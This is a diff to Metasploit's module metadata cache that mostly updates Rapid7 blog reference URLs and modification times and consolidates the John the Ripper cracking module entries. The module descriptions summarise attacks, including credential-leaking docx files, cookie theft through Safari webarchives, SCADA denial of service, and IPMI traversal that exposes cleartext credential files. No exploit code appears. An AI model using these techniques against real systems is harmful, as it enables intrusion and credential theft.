      "URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
      "URL-https://github.com/sjhilt/GasPot",
      "URL-https://github.com/mushorg/conpot",
@@ -216,7 +216,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/atg/atg_client.rb",
    "is_install_path": true,
    "ref_name": "admin/atg/atg_client",
@@ -1204,7 +1204,7 @@
      "CVE-2015-0964",
      "CVE-2015-0965",
      "CVE-2015-0966",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
+      "URL-https://blog.rapid7.com/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
    ],
    "platform": "",
    "arch": "",
@@ -1216,7 +1216,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
    "is_install_path": true,
    "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -2661,7 +2661,7 @@
    "references": [
      "CVE-2013-0136",
      "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
@@ -2682,7 +2682,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
    "is_install_path": true,
    "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2907,7 +2907,7 @@
    ],
    "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n        of vectors. This vulnerability can allow an attacker to a craft special XML that\n        could read arbitrary files from the filesystem. This module exploits the\n        vulnerability via the XML API.",
    "references": [
-      "URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
+      "URL-https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24"
    ],
    "platform": "",
    "arch": "",
@@ -2928,7 +2928,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
    "is_install_path": true,
    "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3054,7 +3054,7 @@
      "CVE-2013-3617",
      "OSVDB-99141",
      "BID-63431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "",
    "arch": "",
@@ -3075,7 +3075,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
    "is_install_path": true,
    "ref_name": "admin/http/openbravo_xxe",
@@ -4558,7 +4558,7 @@
      "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
      "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
      "URL-https://github.com/bidord/pykek",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
+      "URL-https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
    ],
    "platform": "",
    "arch": "",
@@ -4570,7 +4570,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -6733,7 +6733,7 @@
    "description": "This module allows an unauthenticated user to interact with the Yokogawa\n        CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n        operations.",
    "references": [
      "CVE-2014-5208",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
+      "URL-https://blog.rapid7.com/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
    ],
    "platform": "",
    "arch": "",
@@ -6745,7 +6745,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-09-24 12:15:43 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
    "is_install_path": true,
    "ref_name": "admin/scada/yokogawa_bkbcopyd_client",
@@ -7946,7 +7946,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-03-04 19:25:56 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
    "is_install_path": true,
    "ref_name": "admin/wemo/crockpot",
@@ -8083,10 +8083,10 @@
    "name": "Password Cracker: Databases",
    "fullname": "auxiliary/analyze/crack_databases",
    "aliases": [
-      "auxiliary/analyze/jtr_mssql",
-      "auxiliary/analyze/jtr_mysql",
-      "auxiliary/analyze/jtr_oracle",
-      "auxiliary/analyze/jtr_postgres"
+      "auxiliary/analyze/jtr_mssql_fast",
+      "auxiliary/analyze/jtr_mysql_fast",
+      "auxiliary/analyze/jtr_oracle_fast",
+      "auxiliary/analyze/jtr_postgres_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8110,7 +8110,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_databases.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_databases",
@@ -8275,8 +8275,7 @@
    "name": "Password Cracker: Windows",
    "fullname": "auxiliary/analyze/crack_windows",
    "aliases": [
-      "auxiliary/analyze/jtr_crack_fast",
-      "auxiliary/analyze/jtr_windows"
+      "auxiliary/analyze/jtr_windows_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8300,7 +8299,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -8311,270 +8310,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_analyze/jtr_aix": {
-    "name": "John the Ripper AIX Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_aix",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_aix",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_linux": {
-    "name": "John the Ripper Linux Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_linux",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix systems. The module will only crack\n        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n        Blowfish and SHA(256/512). Warning: This is much slower.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_linux",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mssql_fast": {
-    "name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mssql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mssql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mssql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mysql_fast": {
-    "name": "John the Ripper MySQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mysql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mysql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mysql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_oracle_fast": {
-    "name": "John the Ripper Oracle Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_oracle_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the oracle_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_oracle_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_postgres_fast": {
-    "name": "John the Ripper Postgres SQL Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_postgres_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>"
-    ],
-    "description": "This module uses John the Ripper to attempt to crack Postgres password\n          hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n          JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n          format.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_postgres_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_windows_fast": {
-    "name": "John the Ripper Windows Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_windows_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n        of this module is to find trivial passwords in a short amount of time. To\n        crack complex passwords or use large wordlists, John the Ripper should be\n        used outside of Metasploit. This initial version just handles LM/NTLM credentials\n        from hashdump and uses the standard wordlist and rules.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_windows_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_analyze/modbus_zip": {
    "name": "Extract zip from Modbus communication",
    "fullname": "auxiliary/analyze/modbus_zip",
@@ -9053,7 +8788,7 @@
    ],
    "description": "This module modifies a .docx file that will, upon opening, submit stored\n        netNTLM credentials to a remote host. It can also create an empty docx file. If\n        emailed the receiver needs to put the document in editing mode before the remote\n        server will be contacted. Preview and read-only mode do not work. Verified to work\n        with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n        auxiliary/server/capture/smb module can be used.",
    "references": [
-      "URL-http://jedicorp.com/?p=534"
+      "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
    ],
    "platform": "",
    "arch": "",
@@ -9065,7 +8800,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-24 18:17:06 +0000",
    "path": "/modules/auxiliary/docx/word_unc_injector.rb",
    "is_install_path": true,
    "ref_name": "docx/word_unc_injector",
@@ -10296,7 +10031,7 @@
    "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n        File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n        where NFRAgent.exe fails to generate a response in a secure way, copying user\n        controlled data into a fixed-length buffer in the heap without bounds checking.\n        This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
    "references": [
      "CVE-2012-4956",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -10317,7 +10052,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
    "is_install_path": true,
    "ref_name": "dos/http/novell_file_reporter_heap_bof",
@@ -11545,7 +11280,7 @@
    "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n        exists in the handling of malformed log packets, with an unexpected long level field.\n        The root cause of the vulnerability is a combination of usage of uninitialized memory\n        from the stack and a dangerous string copy. This module has been tested successfully\n        on Yokogawa CENTUM CS 3000 R3.08.50.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0781"
    ],
    "platform": "",
@@ -11558,7 +11293,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
    "is_install_path": true,
    "ref_name": "dos/scada/yokogawa_logsvr",
@@ -11596,7 +11331,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-03-23 14:55:18 +0000",
+    "mod_time": "2020-02-25 19:59:27 +0000",
    "path": "/modules/auxiliary/dos/smb/smb_loris.rb",
    "is_install_path": true,
    "ref_name": "dos/smb/smb_loris",
@@ -12763,7 +12498,7 @@
      "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
      "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
      "EDB-18606",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
+      "URL-https://blog.rapid7.com/2012/03/21/metasploit-update"
    ],
    "platform": "",
    "arch": "",
@@ -12775,7 +12510,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -14940,7 +14675,7 @@
    ],
    "description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n        inject cross-domain Javascript (UXSS), silently install a browser\n        extension, collect user information, steal the cookie database,\n        and steal arbitrary local files.\n\n        When opened on the target machine the webarchive file must not have the\n        quarantine attribute set, as this forces the webarchive to execute in a\n        sandbox.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
+      "URL-https://blog.rapid7.com/2013/04/25/abusing-safaris-webarchive-file-format"
    ],
    "platform": "",
    "arch": "",
@@ -14952,7 +14687,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
    "is_install_path": true,
    "ref_name": "gather/apple_safari_webarchive_uxss",
@@ -16029,7 +15764,7 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module checks for the public source IP address of the current\n        route to the RHOST by querying the public web application at ifconfig.me.\n        It should be noted this module will register activity on ifconfig.me,\n        which is not affiliated with Metasploit.",
    "references": [
@@ -16054,7 +15789,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/auxiliary/gather/external_ip.rb",
    "is_install_path": true,
    "ref_name": "gather/external_ip",
@@ -27726,7 +27461,7 @@
    "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n        with an FSFUI record with UICMD 126. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
    "references": [
      "CVE-2012-4958",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -27747,7 +27482,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
@@ -27773,7 +27508,7 @@
    "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n        CMD 103, specifying a full pathname. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
    "references": [
      "CVE-2012-4957",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -27795,7 +27530,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -28398,7 +28133,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-02-23 13:16:41 +0000",
+    "mod_time": "2020-02-25 10:14:02 +0000",
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
@@ -28702,7 +28437,7 @@
    "description": "This module attempts to identify Ruby on Rails instances vulnerable to\n        an arbitrary object instantiation flaw in the XML request processor.",
    "references": [
      "CVE-2013-0156",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
    ],
    "platform": "",
    "arch": "",
@@ -28723,7 +28458,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_xml_yaml_scanner",
@@ -29548,7 +29283,7 @@
    "references": [
      "CVE-2013-3621",
      "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
@@ -29569,7 +29304,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
@@ -29596,7 +29331,7 @@
    "description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n        controllers. An attacker with access to the publicly-available firmware can perform\n        man-in-the-middle attacks and offline decryption of communication to the controller.\n        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        version SMT_X9_214.",
    "references": [
      "CVE-2013-3619",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
@@ -29608,7 +29343,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -29634,7 +29369,7 @@
    ],
    "description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n        accessible through the web interface of Supermicro Onboard IPMI controllers.  The vulnerability\n        is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n        a valid, but not necessarily administrator-level account, to access the contents of any file\n        on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n        all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n        /wsman/simple_auth.passwd",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
      "URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
    ],
    "platform": "",
@@ -29656,7 +29391,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -32427,7 +32162,7 @@
    "description": "This module exploits a hardcoded user and password for the GetFile maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n        remote files. This module has been successfully tested on Novell ZENworks Asset\n        Management 7.5.",
    "references": [
      "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
    ],
    "platform": "",
    "arch": "",
@@ -32448,7 +32183,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
@@ -32474,7 +32209,7 @@
    "description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve the configuration parameters of\n        Novell Zenworks Asset Managment, including the database credentials in clear text.\n        This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
    "references": [
      "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
    ],
    "platform": "",
    "arch": "",
@@ -32495,7 +32230,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
@@ -34252,7 +33987,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -34370,7 +34105,7 @@
    "references": [
      "CVE-2012-2122",
      "OSVDB-82804",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
+      "URL-https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
    ],
    "platform": "",
    "arch": "",
@@ -34382,7 +34117,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -34494,7 +34229,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
@@ -35614,7 +35349,7 @@
      "Patrik Karlsson <patrik@cqure.net>",
      "todb <todb@metasploit.com>"
    ],
-    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
+    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n        Due to a bug in nmap versions 6.50-7.80 may not work.",
    "references": [
      "URL-http://www.oracle.com/us/products/database/index.html",
      "CVE-1999-0502",
@@ -35630,7 +35365,7 @@

